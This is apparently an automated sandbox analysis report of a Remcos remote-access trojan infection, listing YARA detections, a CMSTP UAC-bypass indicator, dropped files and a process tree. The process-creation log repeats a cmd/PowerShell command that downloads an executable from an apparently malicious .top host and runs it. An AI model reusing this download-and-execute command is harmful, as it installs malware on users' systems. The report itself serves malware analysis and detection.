Source: 12.2.DZIPR.exe.35df9ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.cmd.exe.4fb1757.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.5274a8a.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.explorer.exe.cc9757.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.51df757.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.55b9757.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.explorer.exe.c83a8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.explorer.exe.474b757.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001A.00000002.1827195478.00000000005CB000.00000004.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: classification engine

Classification label: mal100.troj.expl.evad.winLNK@34/27@2/2

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,

11_2_00407776

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_0040118A GetDiskFreeSpaceExW,SendMessageW,

11_2_0040118A

Source: C:\Users\user\AppData\Roaming\hello.exe

11_2_004034C1

Source: C:\Users\user\AppData\Roaming\hello.exe

11_2_00401BDF

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\hello.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2376:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2856:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l31uaxlx.vs2.ps1

Jump to behavior

Source: Yara match	File source: 12.0.DZIPR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000003.1378606402.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.1381062753.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\DZIPR.exe, type: DROPPED

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe && C:\Users\user\AppData\Roaming/hello.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\hello.exe C:\Users\user\AppData\Roaming/hello.exe
Source: C:\Users\user\AppData\Roaming\hello.exe	Process created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe"
Source: C:\Users\user\DZIPR.exe	Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe "C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\hello.exe C:\Users\user\AppData\Roaming/hello.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Process created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe"	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
